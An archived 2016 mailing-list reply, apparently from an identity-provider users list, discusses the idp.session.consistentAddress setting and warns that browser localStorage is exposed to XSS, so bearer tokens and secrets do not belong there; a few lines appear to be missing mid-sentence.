idp.session.consistentAddress and real security implications.
putmanb at georgetown.edu
Mon Apr 25 15:25:30 EDT 2016
On 4/25/16 2:15 PM, Cantor, Scott wrote:
> If Local Storage is equally vulnerable to theft, which is likely, then having that data on the client doesn't affect this risk much.
I was looking into this recently for other reasons. My understanding so
far is that localStorage/sessionStorage is accessible from any
That means it's completely vulnerable via XSS attacks for theft,
tampering, etc, if the attacker manages to get the browser to load and
local storage not be used for the storage of any security-sensitive
info, so as OAuth security tokens or any other kind of bearer token, and
of course not passwords, secrets, etc.
I was actually going to bring up soon what and how the IdP is actually
doing with local storage and the client-side storage service impl, just
so I understand better better the tradeoffs in general.
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the users